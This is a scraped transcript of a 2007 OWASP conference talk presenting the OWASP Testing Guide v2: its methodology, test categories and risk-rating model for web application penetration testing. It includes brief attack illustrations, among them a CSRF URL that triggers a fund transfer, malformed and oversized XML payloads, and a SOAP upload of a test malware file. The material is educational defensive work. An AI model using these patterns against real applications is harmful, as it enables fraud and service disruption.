Presentation is loading. Please wait.

Presentation is loading. Please wait.

Copyright © 2007 - The OWASP Foundation Permission is granted to copy, distribute and/or modify this document under the terms of the Creative Commons Attribution-ShareAlike.

Similar presentations


Presentation on theme: "Copyright © 2007 - The OWASP Foundation Permission is granted to copy, distribute and/or modify this document under the terms of the Creative Commons Attribution-ShareAlike."— Presentation transcript:

1 Copyright © The OWASP Foundation Permission is granted to copy, distribute and/or modify this document under the terms of the Creative Commons Attribution-ShareAlike 2.5 License. To view this license, visit The OWASP Foundation 6 th OWASP AppSec Conference Milan - May OWASP Testing Guide v2 Matteo Meucci OWASP Testing Guide lead OWASP Italy Chair

2 6 th OWASP AppSec Conference – Milan – May Agenda:  The new Testing Guide: goals and deliverables  The OWASP Testing Framework  The Testing Methodology: how to test  Reporting: how to evaluate the risk and write a report  How the Guide will be useful to the web security industry  Q&A

3 6 th OWASP AppSec Conference – Milan – May Introduction – Matteo Meucci  OWASP Testing Guide lead 2007 thanks to the AoC!  6+ years in Information Security focusing on Application Security  OWASP Italy founder and Chair  Consultant at BT Global Services

4 6 th OWASP AppSec Conference – Milan – May OWASP Projects Vulnerability Vulnerabilities Attack Attacks Threat Agents Business Impacts Business Impact Business Impact System Impacts Asset Testing Guide Code Review Guide Building Guide Honeycomb Tools Countermeasures Countermeasure

5 6 th OWASP AppSec Conference – Milan – May What Is the OWASP Testing Guide?  Free and open…  “It's impossible to underestimate the importance of having this guide available in a completely free and open way”– Jeff Williams (OWASP Chair)

6 6 th OWASP AppSec Conference – Milan – May OWASP Testing Guide v2: Goals  Review all the documentation on testing:  July 14, 2004  "OWASP Web Application Penetration Checklist", Version 1.1  December 2004  "The OWASP Testing Guide", Version 1.0  Create a completely new project focused on Web Application Penetration Testing  Create a reference for application testing and describe the OWASP methodology  Our approach in writing this guide  Open  Collaborative  Defined testing methodology  Consistent  Repeatable  High quality

7 6 th OWASP AppSec Conference – Milan – May  Start in Oct 2006:  Collect all old docs  Brainstorming for the Index and template  Involve major world experts in this field: * David Endler * Giorgio Fedon * Javier Fernández-Sanguino * Glyn Geoghegan * Stan Guzik * Madhura Halasgikar * Eoin Keary * David Litchfield * Andrea Lombardini * Ralph M. Los * Claudio Merloni * Matteo Meucci * Marco Morana * Laura Nunez * Gunter Ollmann * Antonio Parata * Yiannis Pavlosoglou * Carlo Pelliccioni * Harinath Pudipeddi * Alberto Revelli * Mark Roxberry * Tom Ryan * Anush Shetty * Larry Shields * Dafydd Studdard * Andrew van der Stock * Ariel Waissbein * Jeff Williams * Vicente Aguilera * Mauro Bregolin * Tom Brennan * Gary Burns * Luca Carettoni * Dan Cornell * Mark Curphey * Daniel Cuthbert * Sebastien Deleersnyder * Stephen DeVries * Stefano Di Paola OWASP Testing Guide v2: Action Plan

8 6 th OWASP AppSec Conference – Milan – May  Nov 2006:  Write articles using our Wiki model  Review articles  Dec 2006:  Review all the Guide  Write the Guide in doc format  Jan 2007:  OWASP Testing Guide Release Candidate 1: 272 pages, 48 tests  Feedback and review  Feb 2007:  OWASP Testing Guide v2 officially released OWASP Testing Guide v2: Action Plan (2) SANS Top cites our guide in section "C1. Web Applications" "Congratulations on version 2 of the OWASP Testing Guide! It is an impressive and informative document that will greatly benefit the software development community". Joe Jarzombek, the Deputy Director for Software Assurance at Department of Homeland Security

9 6 th OWASP AppSec Conference – Milan – May Testing Guide v2: Index 1. Frontispiece 2. Introduction 3. The OWASP Testing Framework 4. Web Application Penetration Testing 5. Writing Reports: value the real risk Appendix A: Testing Tools Appendix B: Suggested Reading Appendix C: Fuzz Vectors

10 6 th OWASP AppSec Conference – Milan – May  Principles of Testing: comparing the state of something against a set of criteria defined and complete.  We want security testing to not be a black art  SDLC phases:  Define  Design  Develop  Deploy  Maintenance The OWASP Testing Framework in SDLC Before SDLC Define&Design Development Deploy&Maintenance

11 6 th OWASP AppSec Conference – Milan – May Testing Techniques  Manual Inspections & Reviews  Test to ensure that the appropriate policy and standards are in place for the development team  Threat Modeling  Security Requirements Review  Design an Architecture review, how the application works  Create and Review Threat Models: develop realistic threat scenarios Before SDLC Define&Design Development Deploy&Maintenance

12 6 th OWASP AppSec Conference – Milan – May Testing Techniques  Code Review  Code Walkthroughs (high-level)  Code Reviews (White Box Testing): static code reviews validate the code against a set of checklists (CIA Triad, OWASP Top10,..)  Penetration Testing  Focus of this guide: Black Box Testing  The process involves an active analysis of the application for any weaknesses, technical flaws or vulnerabilities Before SDLC Define&Design Development Deploy&Maintenance

13 6 th OWASP AppSec Conference – Milan – May OWASP Framework SDLC & OWASP Guidelines

14 6 th OWASP AppSec Conference – Milan – May Testing paragraph template  Brief Summary Describe in "natural language" what we want to test. The target of this section is non-technical people (e.g.: client executive)  Description of the Issue Short Description of the Issue: Topic and Explanation  Black Box testing and example  How to test for vulnerabilities:  Result Expected:...  Gray Box testing and example  How to test for vulnerabilities:  Result Expected:...  References  Whitepapers  Tools

15 6 th OWASP AppSec Conference – Milan – May Black Box vs. Gray Box The penetration tester does not have any information about the structure of the application, its components and internals Black Box The penetration tester has partial information about the application internals. E.g.: platform vendor, sessionID generation algorithm Gray Box White box testing, defined as complete knowledge of the application internals, is beyond the scope of the Testing Guide and is covered by the OWASP Code Review Project

16 6 th OWASP AppSec Conference – Milan – May  We have split the set of tests in 8 sub-categories (for a total amount of 48 controls):  Information Gathering  Business logic testing  Authentication Testing  Session Management Testing  Data Validation Testing  Denial of Service Testing  Web Services Testing  AJAX Testing Testing Model In the next slides we will look at a few examples of tests/attacks and at some real-world cases....

17 6 th OWASP AppSec Conference – Milan – May Information Gathering  The first phase in security assessment is of course focused on collecting all the information about a target application.  Using public tools it is possible to force the application to leak information by sending messages that reveal the versions and technologies used by the application  Available techniques include:  Raw HTTP Connections (netcat)  The good old tools: nmap, amap,...  Web Spiders  Search engines (“Google Dorking”)  SSL fingerprinting  File extensions handling  Backups and unreferenced files

18 6 th OWASP AppSec Conference – Milan – May  Rules that express the business policy (such as channels, location, logistics, prices, and products)  Workflows that are the ordered tasks of passing documents or data from one participant (a person or a software system) to another  One of the most common results in this step of the analysis are flaws in the order of actions that a user has to follow: an attacker could perform them in a different order to get some sort of advantage This step is the most difficult to perform with automated tools, as it requires the penetration tester to perfectly understand the business logic that is (or should be) implemented by the application Business logic testing In this phase, we look for flaws in the application business logic rather than in the technical implementation. Areas of testing include:

19 6 th OWASP AppSec Conference – Milan – May Business logic testing FlawedPhone was soon targeted by a fraud attack  The attacker bought a new FlawedPhone SIM card  The attacker immediately requested to transfer the SIM card to another mobile carrier, which credits 0.05 € for each received SMS message  When the SIM card was “transferred” to the new provider, the attacker then started sending thousands of s to her FlawedPhone account  The attacker had a 6-8 hours window before the +SMS application had its list updated and stopped delivering messages  By that time, the attacker had ~ € in the card, and proceeded to sell it on eBay All FlawedPhone systems worked as expected, and there were no bugs in the application code. Still, the logic was flawed.

20 6 th OWASP AppSec Conference – Milan – May Authentication testing Testing the authentication scheme means understanding how the application checks for users' identity and using that information to circumvent that mechanism and access the application without having the proper credentials Tests include the following areas: Default or Guessable Accounts Brute-force Bypassing Authentication Directory Traversal / File Include Vulnerable “Remember Password” and Password Reset Logout and Browser Cache Management

21 6 th OWASP AppSec Conference – Milan – May Session management testing Session management is a critical part of a security test, as every application has to deal with the fact that HTTP is by its nature a stateless protocol. Session Management broadly covers all controls on a user from authentication to leaving the application Tests include the following areas:  Analysis of the session management scheme  Cookie and session token manipulation  Exposed session variables  Cross Site Request Forgery  HTTP Exploiting

22 6 th OWASP AppSec Conference – Milan – May Test if it is possible to force a user to submit an undesirable command to the application he/she is currently logged into  Also known as “Session Riding”  A quite old type of attack, whose impact has always been underestimated  It relies on the fact that browsers automatically send information used to identify a specific session  Applications that allow a user to perform some action without requiring some unpredictable parameter are likely to be vulnerable ...That means a lot of applications!  All it takes is to trick the victim into following a link (e.g.: by visiting an attacker-controlled site) while he/she is logged into the application Example: Cross Site Request Forgery

23 6 th OWASP AppSec Conference – Milan – May I am a very evil HTML page... visit me ! :).....  trade.com is an online trading company  trade.com uses an “über-paranoid triple-factor”™ authentication scheme, but does not want to bother users with confirmations, since traders need to act fast!  Tester finds that a simple GET as follow: https://trade.com/transfer?eu=90000&to=1234 Permits to execute a transaction The image is not visible The link triggers a fund transfer Example: Cross Site Request Forgery (cont.)

24 6 th OWASP AppSec Conference – Milan – May Data validation testing In this phase we test that all input is properly sanitized before being processed by the application, in order to avoid several classes of attacks  Cross site scripting Test that the application filters JavaScript code that might be executed by the victim in order to steal his/her cookier  HTTP Methods and XST Test that the remote web server does not allow the TRACE HTTP method  SQL Injection Test that the application properly filters SQL code embedded in the user input  Other attacks based of faulty input validation...  LDAP/XML/SMTP/OS injection  Buffer overflows

25 6 th OWASP AppSec Conference – Milan – May Denial of Service Testing  Locking Customer Accounts  User Specified Object Allocation  User Input as a Loop Counter  Writing User Provided Data to Disk  Failure to Release Resources  Storing too Much Data in Session Usually not performed in production environments DoS are types of vulnerabilities within applications that can allow a malicious user to make certain functionality or sometimes the entire website unavailable. These problems are caused by bugs in the application, often resulting from malicious or unexpected user input

26 6 th OWASP AppSec Conference – Milan – May  The vulnerabilities are similar to other “classical” vulnerabilities such as SQL injection, information disclosure and leakage etc but web services also have unique XML/parser related vulnerabilities.  WebScarab (available for free at provides a plug-in specifically targeted to Web Services. It can be used to craft SOAP messages that contains malicious elements in order to test how the remote system validates inputwww.owasp.org Web Services Testing

27 6 th OWASP AppSec Conference – Milan – May Web Services Testing OWASP EOIN I am Malformed Example of XML Structural Test  XML Structural Testing In this example, we see a snippet of XML code that violates the hierarchical structure of this language. A Web Service must be able to handle this kind of exception in a secure way

28 6 th OWASP AppSec Conference – Milan – May I am a Large String (1MB) I am a Large String (1MB) … … Web Services Testing (cont.)  XML Large payload Another possible attack consists of sending to a Web Service a very large payload in an XML message. Such a message might deplete the resource of a DOM parser

29 6 th OWASP AppSec Conference – Milan – May  Naughty SOAP attachments Binary files, including executables and document types that can contain malware, can be posted using a web service in several ways POST /Service/Service.asmx HTTP/1.1 Host: somehost Content-Type: text/xml; charset=utf-8 Content-Length: length SOAPAction: eicar.pdf pdf true Web Services Testing (cont.)

30 6 th OWASP AppSec Conference – Milan – May AJAX Testing  AJAX (Asynchronous JavaScript and XML) is a web development technique used to create more interactive web applications.  XMLHttpRequest object and JavaScript to make asynchronous requests for all communication with the server-side application.  Main security issues:  AJAX applications have a greater attack surface because a big share of the application logic is moved on the client side  AJAX programmers seldom keep an eye on what is executed by the client and what is executed by the server  Exposed internal functions of the application  Client access to third-party resources with no built-in security and encoding mechanisms  Failure to protect authentication information and sessions  AJAX Bridging

31 6 th OWASP AppSec Conference – Milan – May  While in traditional web applications it is very easy to enumerate the points of interaction between clients and servers, when testing AJAX pages things get a little bit more complicated, as server-side AJAX endpoints are not as easy or consistent to discover  To enumerate endpoints, two approaches must be combined:  Look through HTML and Javascript (e.g: look for XmlHttpRequest objects)  Use a proxy to monitor traffic  Tools: OWASP Sprajax or Firebug add-on for Firefox  Then you can test it as described before (SQL Inj, etc..) ...and don't forget AJAX potential in prototype hijacking and resident XSS ! AJAX Testing

32 6 th OWASP AppSec Conference – Milan – May AJAX Testing (cont.) With firebug it is possible to efficiently inspect AJAX apps

33 6 th OWASP AppSec Conference – Milan – May Testing Report: model  The OWASP Risk Rating Methodology  Estimate the severity of all of these risks to your business  This is not universal risk rating system: vulnerability that is critical to one organization may not be very important to another  Simple approach to be tailored for every case  standard risk model: Risk = Likelihood * Impact  Step 1: identifying a risk You'll need to gather information about:  the vulnerability involved  the threat agent involved  the attack we are using  the impact of a successful exploit on your business.

34 6 th OWASP AppSec Conference – Milan – May Testing Report: likelihood  Step 2: factors for estimating likelihood Generally, identifying whether the likelihood is low, medium, or high is sufficient. Threat Agent Factors:  Skill level (0-9)  Motive (0-9)  Opportunity (0-9)  Size (0-9) Vulnerability Factors:  Ease of discovery (0-9)  Ease of exploit (0-9)  Awareness (0-9)  Intrusion detection (0-9)

35 6 th OWASP AppSec Conference – Milan – May Testing Report: impact  Step 3: factors for estimating impact Technical impact:  Loss of confidentiality (0-9)  Loss of integrity (0-9)  Loss of availability (0-9)  Loss of accountability (0-9) Business impact:  Financial damage (0-9)  Reputation damage (0-9)  Non-compliance (0-9)  Privacy violation (0-9)

36 6 th OWASP AppSec Conference – Milan – May Testing Report: value the risk  Step 4: determining the severity of the risk  In the example above, the likelihood is MEDIUM, and the technical impact is HIGH, so from technical the overall severity is HIGH. But business impact is actually LOW, so the overall severity is best described as LOW as well.

37 6 th OWASP AppSec Conference – Milan – May Writing Report  I. Executive Summary  II. Technical Management Overview  III Assessment Findings  IV Toolbox

38 6 th OWASP AppSec Conference – Milan – May How the Guide will help the security industry A structured approach to the testing activities A checklist to be followed A learning and training tool Pen-testers A tool to understand web vulnerabilities and their impact A way to check the quality of the penetration tests they buy Clients More generally, the Guide aims to provide a pen-testing standard that creates a 'common ground' between the pen-testing industry and its client. This will raise the overall quality and understanding of this kind of activity and therefore the general level of security in our infrastructures

39 6 th OWASP AppSec Conference – Milan – May What’s next  OWASP Testing Guide next steps:  Continuously improve the Testing Guide: it’s a live document!  Start a new project: contribute to the new version?  Improve the client side testing (see next great talk from Stefano di Paola)  Translate it: the Guide has just been translated in Spanish, thanks to Daniel P.F.!  Thanks to Alberto Revelli for producing some slides we discussed at EuSecWest07

40 6 th OWASP AppSec Conference – Milan – May Thank you!


Download ppt "Copyright © 2007 - The OWASP Foundation Permission is granted to copy, distribute and/or modify this document under the terms of the Creative Commons Attribution-ShareAlike."

Similar presentations


Ads by Google